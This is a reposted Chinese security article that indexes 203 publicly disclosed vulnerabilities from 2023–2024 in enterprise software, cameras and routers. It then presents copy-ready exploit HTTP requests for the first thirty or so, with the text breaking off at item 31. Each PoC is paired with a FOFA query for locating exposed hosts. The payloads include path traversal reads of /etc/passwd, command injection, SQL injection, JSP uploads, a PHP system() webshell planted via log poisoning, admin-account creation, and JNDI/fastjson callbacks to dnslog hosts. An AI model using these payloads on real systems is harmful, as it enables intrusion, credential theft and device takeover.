Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.
Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive and defensive exercises, and this article is intended to help with defense. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts and websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public; contact the product vendor for patches or remediation guidance.

Content: due to length constraints, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

01 Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 garment management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi-Anxin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking billing system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值 management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. Founder all-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02 POC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the backend with the default account admin, then perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used for the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the injected function executes base64-encoded input.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target environment to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
